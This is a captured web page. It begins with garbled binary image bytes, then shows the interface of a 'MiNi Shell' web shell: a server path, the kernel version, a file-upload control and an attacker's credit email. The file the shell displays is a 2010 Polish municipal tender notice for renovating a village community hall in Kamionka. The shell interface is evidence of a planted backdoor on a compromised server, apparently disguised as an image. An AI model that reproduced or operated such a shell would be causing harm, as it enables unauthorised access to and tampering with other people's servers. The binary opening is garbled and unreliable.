JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100114/11802-N-2010.html

<p class="kh_header"><b>Smętowo Graniczne: Modernizacja świetlicy wiejskiej w miejscowości Kamionka.</b><br>
<b>Numer ogłoszenia: 11802 - 2010; data zamieszczenia: 14.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Smętowo Graniczne , ul. Dworcowa 10, 83-230 Smętowo Graniczne, woj. pomorskie, tel. 058 5619033, faks 058 5619520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.smetowograniczne.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja świetlicy wiejskiej w miejscowości Kamionka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania Modernizacja świetlicy wiejskiej w miejscowości Kamionka.
W zakres zadania wchodzi:
1. Wymiana stolarki okiennej na PCV:  
1.1  Dostawa i montaż okien rozwiernych i uchylno-rozwiernych jednodzielnych-
       powierzchnia 2,32m2;
1.2  Dostawa i montaż okien rozwiernych i uchylno-rozwiernych dwudzielnych - 
       powierzchnia 24,46m2;
1.3  Dostawa i montaż parapetów wewnętrznych drewnianych - długość : 17,94mb;
2. Wymiana stolarki drzwiowej wewnętrznej i zewnętrznej :  
2.1 Dostawa i montaż drzwi aluminiowych dwuskrzydłowych+naświetlanie boczne-drzwi 
       wejściowe z szyba zbrojoną - powierzchnia 5,76m2;
2.2  Dostawa i montaż drzwi zewnętrznych wzmocnionych drewnianych - powierzchnia
       4,2m2;
2.3  Dostawa i montaż drzwi płytowych wewnętrznych-powierzchnia 16,61m2;
3. Malowanie elewacji farbą akrylową wraz z przygotowaniem podłoża..
3.1 Rozebranie obróbek murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy - powierzchnia - 52,00m2;
3.2 Wykonanie opierzania dachu i parapetów zewnętrznych z blachy stalowej powlekanej - powierzchnia - 52,00m2;
3.3 Przygotowanie podłoża-oczyszczenie i zmycie- powierzchnia- 345,00m2;
3.4 Malowanie elewacji farbą akrylową (2- krotnie) - powierzchnia- 345,00m2;
4. Wymiana instalacji elektrycznej.
4.1  Demontaż istniejącej instalacji elektrycznej (przewody, łączniki, gniazda, puszki,
       odgałęźniki);
4.2  Dostawa i montaż przewodów kabelkowych i puszek. 
4.3. Dostawa i montaż opraw oświetleniowych.
4.4  Dostawa i montaż gniazd wtyczkowych i łączników instalacyjnych;
Do odbioru prac elektrycznych przedstawić wymagane prawem protokoły z badań instalacji elektrycznej wraz ze schematem instalacji elektrycznej.  
5. Wymiana posadzek z deskowania na terakotę i posadzek betonowych na terakotę.
5.1 Rozebranie podłogi drewnianej - powierzchnia 17,43m2;
5.2 Rozebranie posadzek z płytek - powierzchnia 33.93m2;
5.3 Wykonanie podkładów betonowych, izolacji przeciwwilgociowych, izolacji cieplnych oraz
       warstw wyrównawczych - powierzchnia 17,43m2;
5.4 wykonanie posadzek jedno i dwubarwnych z płytek ceramicznych podłogowych 
      terakotowych o wymiarze 30x30cm na zaprawie klejowej ATLAS- powierzchnia
      200,71m2;
      Uwaga : płytki gat. I , płytki szkliwione, klasa ścieralności IV, kolor do uzgodnienia
       z Zamawiającym.  
5.5 Wykonanie cokolików z kształtek z kamieni sztucznych na zaprawie klejowej- długość
      94mb.
6. Wykonanie prac malarskich wewnątrz budynku- odnowienie powłok malarskich. 
6.1 Wykonanie gładzi gipsowych o gr. 3mm na ścianach na podłożu z tynku - powierzchnia
      280,00m2;
6.2 Przecieranie istniejących tynków wewnętrznych z zeskrobaniem farby itp.- powierzchnia
      280,00m2;	
6.3 Dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych- z gruntowaniem 
      - powierzchnia 280,00m2;
7. Okładzina stropu płytami gipsowo-kartonowymi na ruszcie stalowym. 
7.1 Okładzina stropu płytami gipsowo-kartonowymi na ruszcie metalowym pojedynczym
      podwieszanym z kształtowników CD i Ud - powierzchnia 200,71m2;
7.2 Wykonanie gładzi gipsowych na jednowarstwowych o gr. 3mm , na stropie na podłożu z 
      płyt gipsowych - powierzchnia 200,71m2;
7.3 Dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych płyt gipsowych 
      spoinowanych szpachlowanych z gruntowaniem - powierzchnia 200,71m2;
8. Wykonanie i montaż okienka podawczego.
8.1 Wykonanie i montaż okienka podawczego pomiędzy kuchnią a pomieszczeniem 
       podawczym ze stali nierdzewnej o wymiarach szt. 1; 115cmx75cm - szafa podawcza-
       analiza indywidualna. wg rysunku: rzut przyziemia.
9. Roboty remontowe w łazience.
9.1 Wymiana instalacji kanalizacyjnej i wodociągowej 1kpl.; analiza indywidualna. wg rysunku: rzut przyziemia;
9.2 dostawa i montaż (biały montaż) urządzeń sanitarnych  1kpl.; analiza indywidualna. wg rysunku: rzut przyziemia;
Szczegółowy zakres prac został przedstawiony w przedmiarach robót.

Wymagany okres gwarancji na wykonane roboty (materiały i robociznę)  wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych  i podpisania (bez uwag) protokołu końcowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.10.00-4, 45.31.00.00-3, 45.43.00.00-0, 45.41.00.00-4, 45.44.21.00-8, 45.11.13.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca nie wnosi wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy spełniający następujące warunki :
1.1  Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Wykonali w okresie ostatnich 5 lat, przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 roboty budowlane o wartości co najmniej 100000,00zł każda z nich, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.
 W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót wraz z dokumentami potwierdzającymi że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, (referencje, protokoły odbioru itp.)
1.3 Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oraz dysponują  co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej .
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz osób posiadających uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia (wg wzoru stanowiącego załącznik nr 5 do SIWZ) oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby.

1.4 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są złożyć oświadczenie o spełnieniu tego warunku.

2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy:
2.1 podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień
Publicznych,
2.2 złożyli nieprawdziwe informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania,
2.3 nie wykazali spełnienia warunków udziału w postępowaniu o zamówienie publiczne zgodnie z art. 22 ust.1 Prawo zamówień publicznych opisanych w ppkt. 1.1 do 1.4.

3. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o
dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku
granicznego - spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących dokumentów :  
1)  formularz ofertowy sporządzony zgodnie ze wzorem (załącznik nr 1 do SIWZ),
2) oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy i nie podlega wykluczeniu na podstawie art. 24 ust, 1 i 2 ustawy .(załącznik nr 2 do SIWZ),
3) wykaz wykonanych robót budowlanych , sporządzony na podstawie wzoru stanowiącego załącznik nr 3 do SIWZ. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót wraz z dokumentami potwierdzającymi że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, (referencje, protokoły odbioru itp.)
4) Wykaz części zamówienia zleconych podwykonawcom, sporządzony na podstawie wzoru stanowiącego załącznik nr 4 do SIWZ,
5) wykaz osób posiadających uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia (wg wzoru stanowiącego załącznik nr 5 do SIWZ) oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby.
6) oświadczenie , ze Wykonawcy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, (wg wzoru stanowiącego załącznik nr 2 do SIWZ). 
2. Stosowne Pełnomocnictwo(a) - winny być złożone w przypadku, gdy ofertę podpisuje osoba działająca z upoważnienia osoby lub osób reprezentujących firmę zgodnie z wpisem do właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
3.  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby Wykonawcy wspólnie spełniali w/w warunki udziału w postępowaniu a w przypadku konsorcjum żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych.
a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczenie , iż nie podlegają wykluczeniu z postępowania składają oddzielnie,
b) dla udokumentowania właściwej reprezentacji wymagane jest pełnomocnictwo Wykonawców do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
4. W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5.Wszystkie dokumenty w ofercie wykonawca musi przedstawić w formie oryginałów albo kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę.
Załączone do oferty kopie dokumentów należy potwierdzić za zgodność z oryginałem, potwierdzając każdą zapisaną stronę przedkładanego dokumentu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.smetowograniczne.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Smętowie Granicznym, ul. Dworcowa 10, 83-230 Smętowo Graniczne, pokój nr 9..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 11:00, miejsce: Urząd Gminy w Smętowie Granicznym, ul. Dworcowa 10, 83-230 Smętowo Graniczne, sekretariat Urzędu , pokój nr 3..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com